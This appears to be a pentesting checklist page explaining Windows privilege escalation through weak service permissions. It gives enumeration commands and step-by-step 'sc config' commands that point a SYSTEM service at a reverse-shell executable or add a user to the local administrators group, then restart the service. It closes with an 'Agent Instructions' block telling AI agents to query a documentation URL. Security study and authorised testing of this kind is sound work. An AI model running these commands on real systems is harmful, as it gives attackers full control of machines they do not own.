# Insecure Service Permissions ### Overview **Insecure Service Permissions** is a local Windows privilege escalation technique where a non-privileged user has dangerous permissions over a Windows service that runs with **elevated privileges** (usually **LocalSystem**). If an attacker can: * **Modify the service binary** * **Change the service configuration** * **Start/stop the service** they can replace or redirect the service executable to **malicious code**, causing it to run as **SYSTEM**. Core Issue - **Service's DACL** ### Why this Works Windows services: * Often run as **NT AUTHORITY\SYSTEM** and are controlled via **Service Control Manager (SCM)** * Have permissions defined by a **security descriptor** If a service grants **write / change / full control** permissions to: * `Users` * `Authenticated Users` * A low-privileged domain user Then that user can hijack execution. The most dangerous service permissions are given below: | Permission | Meaning | | ----------------------- | ------------------ | | `SERVICE_CHANGE_CONFIG` | Change binary path | | `SERVICE_START` | Start service | | `SERVICE_STOP` | Stop service | | `WRITE_DAC` | Modify permissions | | `WRITE_OWNER` | Take ownership | | `FULL CONTROL` | Everything | ### Prerequisites All of the below must be present: * **Local Access**: Shell or RDP as a **low-privileged user** * **Vulnerable Service**: Service runs as `LocalSystem`, `LocalService`, or high-privilege account. * Ability to Restart Service ### Useful commands ```bash # Command to list services outside the windows directory wmic service get name,pathname,startmode | findstr /i /v "C:\Windows" Get-CimInstance Win32_Service | Where-Object { $_.PathName -notlike 'C:\Windows*' } ``` ### Steps 1. Identify vulnerable service: ```bash # Check what type of privilege the service is running as. sc qc # Check what privileges this user has on this service. Check if above perms are present accesschk.exe /accepteula -vmqec (sc sdshow |convertfrom-sddlstring).DiscretionaryAcl powershell.exe -c "(sc sdshow |convertfrom-sddlstring).DiscretionaryAcl" # Check current state of the service sc query ``` 2. Ensure you have sent a reverse shell exe file to the machine before or send it now(Eg: rev.exe). 3. Modify the Service Binary Path(Needs **SERVICE\_CHANGE\_CONFIG**): ```bash # Run a rev shell sc config VulnService binPath= "C:\Temp\rev.exe" # Add a local admin named 'user' sc config VulnService binpath= "net localgroup administrators user /add" # Run a rev shell and also change the user of the exe as localsystem sc config VulnService binpath= "C:\Temp\rev.exe" obj=LocalSystem ``` 4. Restart/Start the service ```bash sc stop VulnService sc start VulnService ``` 5. Set up a listener and catch the reverse shell. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/windows-privilege-escalation/service-exploits/insecure-service-permissions.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.